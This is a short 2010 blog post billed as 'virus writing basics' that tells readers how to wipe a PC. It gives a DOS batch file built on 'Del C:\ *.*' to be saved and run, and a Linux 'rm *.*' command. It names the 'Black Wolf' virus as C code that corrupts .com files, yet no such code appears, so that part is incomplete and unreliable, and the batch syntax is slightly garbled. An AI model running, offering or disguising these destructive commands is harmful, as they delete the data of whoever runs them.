Thursday, February 25, 2010

Delete all files



This is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX.

DOS programming

Paste the given code in notepad


@Echo off

Del C:\ *.*y



And save it like any_name.bat . Now run this file... All the data is gone from your PC.

LINUX

Just run the command
rm *.* will delete all files of any extension. This is the code of the "Black Wolf" virus.This is in c.
This virus corrupts all the .com files . so be extremely careful what you do with it.

0 comments: